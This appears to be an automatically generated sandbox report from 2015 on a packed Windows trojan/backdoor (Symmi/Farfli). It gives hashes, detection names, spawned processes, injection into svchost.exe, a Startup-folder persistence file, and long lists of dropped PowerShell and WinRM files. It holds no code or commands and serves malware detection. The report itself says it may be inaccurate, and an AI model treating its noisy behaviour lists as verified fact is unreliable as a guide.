Gen.Variant.Symmi.51967_8f378490f9

by malwarelabrobot on December 7th, 2015 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Symmi.51967 (B) (Emsisoft), Gen:Variant.Symmi.51967 (AdAware), Backdoor.Win32.Farfli.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 8f378490f99e113ecd5276d3b4c8669f
SHA1: c5b9a7e235941f465b24ec3de18cbf253ef53e82
SHA256: 1cdd8553c22ca3f4459c46456e28c3677489ec5806427328d6fb9e63700adca9
SSDeep: 6144:yd9HECpbvvL59VScmScwWYCMoQv7xUcBePEOCtur9idkVX:yd9HEC1TjUcH7BCMokCcBePEOCYrYkVX
Size: 299058 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: no certificate found
Created at: 2015-04-23 20:26:11
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

mofcomp.exe:2760
WindowsXP-KB968930-x86-ENG.exe:368
ngen.exe:1788
ngen.exe:1024
ngen.exe:1236
ngen.exe:3784
ngen.exe:3820
ngen.exe:2312
ngen.exe:3872
ngen.exe:3944
ngen.exe:2268
ngen.exe:3388
ngen.exe:1152
ngen.exe:4024
ngen.exe:1584
ngen.exe:1032
ngen.exe:2256
ngen.exe:3664
ngen.exe:2116
ngen.exe:2212
%original file name%.exe:148
%original file name%.exe:1736
update.exe:576
PSCustomSetupUtil.exe:3920
PSCustomSetupUtil.exe:2868
PSCustomSetupUtil.exe:2908
PSCustomSetupUtil.exe:1784
PSCustomSetupUtil.exe:2924
PSCustomSetupUtil.exe:3320
PSCustomSetupUtil.exe:3000
PSCustomSetupUtil.exe:2424
PSCustomSetupUtil.exe:3164
PSCustomSetupUtil.exe:2304
PSCustomSetupUtil.exe:2176
PSCustomSetupUtil.exe:2684
PSCustomSetupUtil.exe:500
PSCustomSetupUtil.exe:2460
PSCustomSetupUtil.exe:2624
PSCustomSetupUtil.exe:2704
PSCustomSetupUtil.exe:2284
PSCustomSetupUtil.exe:2588
PSCustomSetupUtil.exe:3464
PSCustomSetupUtil.exe:224
PSCustomSetupUtil.exe:1880
PSCustomSetupUtil.exe:3392
PSCustomSetupUtil.exe:780
PSCustomSetupUtil.exe:2556
PSCustomSetupUtil.exe:3784
PSCustomSetupUtil.exe:2572
mscorsvw.exe:3568
wsmanhttpconfig.exe:1932
wsmanhttpconfig.exe:2476

The Trojan injects its code into the following process(es):

mscorsvw.exe:3848
svchost.exe:152
svchost.exe:316

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process mofcomp.exe:2760 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\wbem\Logs\mofcomp.log (1817 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (1 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (0 bytes)

The process WindowsXP-KB968930-x86-ENG.exe:368 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\95cb07fb380b69f02f8492ce2d5a\winrshost.exe (22 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_wildcards.help.txt (3 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_while.help.txt (2 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_signing.help.txt (12 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\system.management.automation.resources.dll (3153 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\filesystem.format.ps1xml (133 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_aliases.help.txt (6 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_quoting_rules.help.txt (659 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\wsmanhttpconfig.exe (3009 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_command_precedence.help.txt (8 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\pssetupnativeutils.exe (9 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.backgroundintelligenttransfer.management.dll (1537 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_type_operators.help.txt (5 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_functions_advanced_parameters.help.txt (962 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_remote_requirements.help.txt (6 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\powershell.exe (7339 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_variables.help.txt (6 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_remote_faq.help.txt (775 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_do.help.txt (2 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\wsmprovhost.exe (657 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_pssessions.help.txt (9 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_pssnapins.help.txt (6 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_if.help.txt (3 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.diagnostics.dll (998 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_wmi_cmdlets.help.txt (8 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_remote_troubleshooting.help.txt (146 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.editor.dll (14450 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\powershellcore.format.ps1xml (1492 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_remote_output.help.txt (887 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_remote_jobs.help.txt (13 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\winrsmgr.dll (2 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.wsman.management.dll (5010 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_prompts.help.txt (7 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\getevent.types.ps1xml (15 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\update\update.inf (2457 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\winrssrv.dll (12 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_eventlogs.help.txt (5 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_functions_advanced.help.txt (3 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_preference_variables.help.txt (37 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_windows_powershell_ise.help.txt (6 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_ref.help.txt (1 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\system.management.automation.dll (38414 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\spuninst.exe (3787 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\wsmpty.xsl (1 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\spupdsvc.exe (287 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\spmsg.dll (495 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_return.help.txt (3 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_line_editing.help.txt (1 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_join.help.txt (2 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.security.dll-help.xml (1797 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_operators.help.txt (770 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.wsman.management.resources.dll (13 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\windowspowershellhelp.chm (26041 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_properties.help.txt (7 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\update\update.exe (10748 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\wsman.format.ps1xml (837 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.graphicalhost.dll (4408 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_debuggers.help.txt (21 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.utility.resources.dll (508 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\types.ps1xml (2510 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.consolehost.resources.dll (778 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_pipelines.help.txt (411 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_transactions.help.txt (1011 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\wsmwmipl.dll (2816 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\powershell_ise.resources.dll (4 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_trap.help.txt (10 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_profiles.help.txt (457 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\wsmauto.dll (1842 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\pwrshmsg.dll (4 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_providers.help.txt (59 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_throw.help.txt (5 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\pwrshplugin.dll (802 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\winrscmd.dll (2907 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.gpowershell.resources.dll (408 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_locations.help.txt (794 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_methods.help.txt (6 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_arrays.help.txt (8 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.utility.dll (9684 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\update\update.ver (14 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_language_keywords.help.txt (11 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.management.resources.dll (508 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\powershell.exe.mui (10 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_script_blocks.help.txt (3 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_path_syntax.help.txt (5 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.management.dll (3386 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_comment_based_help.help.txt (595 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_automatic_variables.help.txt (14 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\pspluginwkr.dll (1756 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_assignment_operators.help.txt (379 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\powershell_ise.exe (2526 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_reserved_words.help.txt (1 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\winrmprov.dll (591 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.consolehost.dll (3118 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\wevtfwd.dll (3351 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_remote.help.txt (7 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\winrm.cmd (35 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\update\updspapi.dll (5940 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.wsman.management.dll-help.xml (8740 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\system.management.automation.dll-help.xml (16567 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_functions_cmdletbindingattribute.help.txt (3 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\wsmauto.mof (4 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_functions_advanced_methods.help.txt (9 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\bitstransfer.psd1 (950 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\dotnettypes.format.ps1xml (266 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_continue.help.txt (1 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_modules.help.txt (13 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_objects.help.txt (2 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\wsmsvc.dll (15909 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_jobs.help.txt (12 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_arithmetic_operators.help.txt (168 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_bits_cmdlets.help.txt (7 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_core_commands.help.txt (221 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_foreach.help.txt (10 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_history.help.txt (3 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_pssession_details.help.txt (9 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_ws-management_cmdlets.help.txt (405 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\bitstransfer.format.ps1xml (16 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_split.help.txt (10 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_execution_policies.help.txt (13 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\wsmres.dll (6164 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\importallmodules.psd1 (438 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_for.help.txt (146 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\$shtdwn$.req (788 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_script_internationalization.help.txt (9 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\powershelltrace.format.ps1xml (344 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\eventforwarding.adm (2 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_functions.help.txt (586 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_windows_powershell_2.0.help.txt (453 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_types.ps1xml.help.txt (481 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\default.help.txt (2 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\registry.format.ps1xml (20 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\wsmplpxy.dll (603 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_hash_tables.help.txt (6 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_session_configurations.help.txt (276 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\update\kb968930xp.cat (512 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_regular_expressions.help.txt (5 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\profile.ps1 (772 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_escape_characters.help.txt (2 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_special_characters.help.txt (3 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\winrm.vbs (2727 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_environment_variables.help.txt (417 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_requires.help.txt (2 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_job_details.help.txt (824 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_commonparameters.help.txt (12 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_parsing.help.txt (2 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\pwrshsip.dll (24 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_command_syntax.help.txt (5 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_break.help.txt (792 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\windowsremoteshell.adm (12 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_logical_operators.help.txt (2 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.editor.resources.dll (562 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_comparison_operators.help.txt (11 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_scripts.help.txt (12 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\update\spcustom.dll (23 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_scopes.help.txt (76 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.wsman.runtime.dll (33 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.security.resources.dll (9 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\winrm.ini (1956 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_format.ps1xml.help.txt (17 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_parameters.help.txt (9 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_data_sections.help.txt (5 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.gpowershell.dll (9738 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_try_catch_finally.help.txt (7 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\update\eula.txt (586 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\wsmtxt.xsl (2 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\certificate.format.ps1xml (155 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\windowsremotemanagement.adm (574 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_switch.help.txt (489 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\winrmprov.mof (789 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\about_redirection.help.txt (2 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\winrs.exe (1154 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\wtrinstaller.ico (4803 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\help.format.ps1xml (3947 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.security.dll (1145 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\diagnostics.format.ps1xml (590 bytes)
C:\95cb07fb380b69f02f8492ce2d5a\pscustomsetuputil.exe (316 bytes)

The Trojan deletes the following file(s):

C:\_130078_ (0 bytes)

The process ngen.exe:1788 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1104 bytes)

The process ngen.exe:1024 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (770 bytes)

The process ngen.exe:1236 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (494 bytes)

The process ngen.exe:3784 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1220 bytes)

The process ngen.exe:3820 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1186 bytes)

The process ngen.exe:2312 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (826 bytes)

The process ngen.exe:3872 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (896 bytes)

The process ngen.exe:3944 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (866 bytes)

The process ngen.exe:2268 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (800 bytes)

The process ngen.exe:3388 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (596 bytes)

The process ngen.exe:1152 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (772 bytes)

The process ngen.exe:4024 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (554 bytes)

The process ngen.exe:1584 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1114 bytes)

The process ngen.exe:1032 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1450 bytes)

The process ngen.exe:2256 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (474 bytes)

The process ngen.exe:3664 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1184 bytes)

The process ngen.exe:2116 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (468 bytes)

The process ngen.exe:2212 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1140 bytes)

The process %original file name%.exe:148 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Start Menu\Programs\Startupx\system.pif (1425 bytes)

The process update.exe:576 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\SETBF.tmp (42 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (16 bytes)
%System%\SET12.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (1281 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (12 bytes)
%System%\SETC.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (36 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (14022 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (950 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (4 bytes)
%System%\SET2D.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (17 bytes)
%System%\SET25.tmp (1281 bytes)
%System%\SET13.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (673 bytes)
%System%\SET20.tmp (2 bytes)
%System%\SET14.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (49 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (673 bytes)
%WinDir%\inf\SET32.tmp (38 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (3 bytes)
%System%\GroupPolicy\Adm\SET34.tmp (38 bytes)
%System%\SET2A.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (10 bytes)
%System%\SET7.tmp (35 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (15 bytes)
%System%\SET22.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (673 bytes)
%System%\spmsg.dll (14 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (7385 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (10 bytes)
%System%\GroupPolicy\Adm\SET1A.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (7 bytes)
%System%\SET2B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (40 bytes)
%WinDir%\inf\SET18.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (3 bytes)
%System%\SETE.tmp (22 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (7641 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (7 bytes)
%System%\SET6.tmp (2 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
%System%\wbem\SET4.tmp (4 bytes)
%System%\SET17.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
%System%\SETA.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (7 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (13 bytes)
%System%\config\SYSTEM.LOG (8521 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (3 bytes)
%System%\SET27.tmp (601 bytes)
%System%\GroupPolicy\Adm\SET1B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (9 bytes)
%System%\SET11.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (24 bytes)
%System%\config (200 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (20 bytes)
%System%\SET8.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (61 bytes)
%System%\SETF.tmp (1281 bytes)
%System%\SET10.tmp (2 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (7971 bytes)
%System%\SET26.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (9 bytes)
%System%\SET21.tmp (35 bytes)
%System%\config\system (4276 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET38.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (24 bytes)
